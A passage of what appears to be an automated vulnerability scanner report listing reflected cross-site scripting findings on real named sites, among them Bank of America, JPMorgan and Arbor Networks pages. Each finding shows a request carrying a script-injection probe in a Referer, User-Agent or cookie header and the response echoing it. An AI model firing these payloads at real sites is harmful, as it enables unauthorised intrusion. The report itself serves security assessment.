Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:04:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3685
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Def54b%27%2Dalert%281%29%2D%27a8c45daa09; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=GECPFOICPDDIKDIBPNDLBLKA; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

2.118. http://www.bankofamerica.com/help/equalhousing_popup.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff9"><script>alert(1)</script>7f3eaf59b2d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /help/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Referer: http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=131550827; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/


                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html lang="en-US">
   <head>
       <meta http-equiv="Content-Type" content="te
...[SNIP]...
<a target="_parent" href="http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d">
...[SNIP]...

2.119. http://www.jpmorgan.com/pages/jpmorgan [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49599--><script>alert(1)</script>3f6c8a7be9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pages/jpmorgan HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT
Date: Wed, 02 Feb 2011 22:19:44 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=c9JYNJYQ7WXh3nVLQdNX56kVHZr1h13x6LR3BV6XVQ8pnhVHjnMl!-1967453422; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <t
...[SNIP]...
<!-- userAgentPassed:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a -->
...[SNIP]...

2.120. http://www.arbornetworks.com/ [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de9b"><script>alert(1)</script>6af6a5ce680 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8de9b\"><script>alert(1)</script>6af6a5ce680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en8de9b"><script>alert(1)</script>6af6a5ce680; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=b90d28fbf3f48927538041d78d1a0444; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:33 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:33 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:34 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en8de9b\"><script>alert(1)</script>6af6a5ce680">
...[SNIP]...

2.121. http://www.arbornetworks.com/cleanpipes [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cleanpipes

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a91"><script>alert(1)</script>4a8a421a526 was submitted in the mbfcookie[lang] cookie. This input was echoed as 56a91\"><script>alert(1)</script>4a8a421a526 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cleanpipes HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56a91"><script>alert(1)</script>4a8a421a526; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:50 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=76e10529127394c687709c1a2755ca13; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:51 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:51 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:52 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en56a91\"><script>alert(1)</script>4a8a421a526">
...[SNIP]...

2.122. http://www.arbornetworks.com/cn/865.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/865.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7177"><script>alert(1)</script>7651ebbe8e8 was submitted in the mbfcookie[lang] cookie. This input was echoed as a7177\"><script>alert(1)</script>7651ebbe8e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cn/865.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena7177"><script>alert(1)</script>7651ebbe8e8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=daccb31a391d41d40e6cb15ef14d3825; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Thu, 03-Feb-2011 23:58:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ena7177\"><script>alert(1)</script>7651ebbe8e8">
...[SNIP]...

2.123. http://www.arbornetworks.com/cn/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaab4"><script>alert(1)</script>d4517558dd0 was submitted in the mbfcookie[lang] cookie. This input was echoed as eaab4\"><script>alert(1)</script>d4517558dd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cn/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=eneaab4"><script>alert(1)</script>d4517558dd0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d36c06ec55280b565d88ed244268fbfa; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Fri, 04-Feb-2011 00:05:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:35 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="eneaab4\"><script>alert(1)</script>d4517558dd0">
...[SNIP]...

2.124. http://www.arbornetworks.com/contact [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /contact

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce73"><script>alert(1)</script>78e956c9366 was submitted in the mbfcookie[lang] cookie. This input was echoed as bce73\"><script>alert(1)</script>78e956c9366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbce73"><script>alert(1)</script>78e956c9366; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3f377e4835493783b636581d8d915ac7; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:04:21 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbce73\"><script>alert(1)</script>78e956c9366">
...[SNIP]...

2.125. http://www.arbornetworks.com/de/5.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/5.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a345"><script>alert(1)</script>86899845244 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6a345\"><script>alert(1)</script>86899845244 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6a345"><script>alert(1)</script>86899845244; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a0c071500549d1e94ca519f8921d0c9e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:48 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:48 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Thu, 03-Feb-2011 23:57:49 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en6a345\"><script>alert(1)</script>86899845244">
...[SNIP]...

2.126. http://www.arbornetworks.com/de/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c53b"><script>alert(1)</script>f0a1f66cb8a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c53b\"><script>alert(1)</script>f0a1f66cb8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c53b"><script>alert(1)</script>f0a1f66cb8a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ded35de59f9cde52854e6194ae0b18e8; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Fri, 04-Feb-2011 00:05:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:26 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en4c53b\"><script>alert(1)</script>f0a1f66cb8a">
...[SNIP]...

2.127. http://www.arbornetworks.com/deeppacketinspection [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /deeppacketinspection

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b5ce"><script>alert(1)</script>46a86177217 was submitted in the mbfcookie[lang] cookie. This input was echoed as 5b5ce\"><script>alert(1)</script>46a86177217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5b5ce"><script>alert(1)</script>46a86177217; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2eebbcb6ceb0e47bc26620dac1e8ac4b; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en5b5ce\"><script>alert(1)</script>46a86177217">
...[SNIP]...

2.128. http://www.arbornetworks.com/en/9.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/9.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad11"><script>alert(1)</script>45c595a351a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4ad11\"><script>alert(1)</script>45c595a351a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
